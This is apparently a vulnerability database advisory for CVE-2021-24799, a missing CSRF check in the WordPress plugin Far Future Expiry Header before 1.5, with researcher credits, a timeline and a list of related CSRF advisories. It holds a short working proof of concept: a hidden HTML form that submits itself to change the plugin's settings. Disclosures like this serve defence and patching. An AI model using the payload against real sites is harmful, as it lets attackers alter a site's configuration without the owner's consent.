Far Future Expiry Header < 1.5 – Plugin's Settings Update via CSRF | CVE 2021-24799 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=ffe_plugin_options" method="post" id="csrf">
<input type="hidden" name="enable-ffe" value="on">
<input type="hidden" name="num-expiry-days" value="1">
<input type="hidden" name="ffe-png" value="on">
<input type="hidden" name="ffe_save_settings" value="1">
</form><script>csrf.submit()</script>

Affects Plugins

far-future-expiry-header

Fixed in 1.5

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

6010ce4e-3e46-4cc1-96d8-560b30b605ed

Timeline

Publicly Published

2021-10-04 (about 4 years ago)

Added

2021-10-04 (about 4 years ago)

Last Updated

2022-04-15 (about 3 years ago)

Other

Published

Title

Published

2024-08-07

Title

MainWP Child Reports < 2.2.1 - Cross-Site Request Forgery to Arbitrary Options Update

Published

2025-05-02

Title

occupancyplan <= 1.0.3.0 - Cross-Site Request Forgery to SQL Injection

Published

2014-08-01

Title

Cool Video Gallery 1.8 - admin/gallery-sort.php Gallery Sort Order Manipulation CSRF

Published

2025-09-05

Title

Ultimate AJAX Login <= 1.2.1 - Cross-Site Request Forgery

Published

2025-06-19

Title

Esselink.nu Settings <= 3.4 - Cross-Site Request Forgery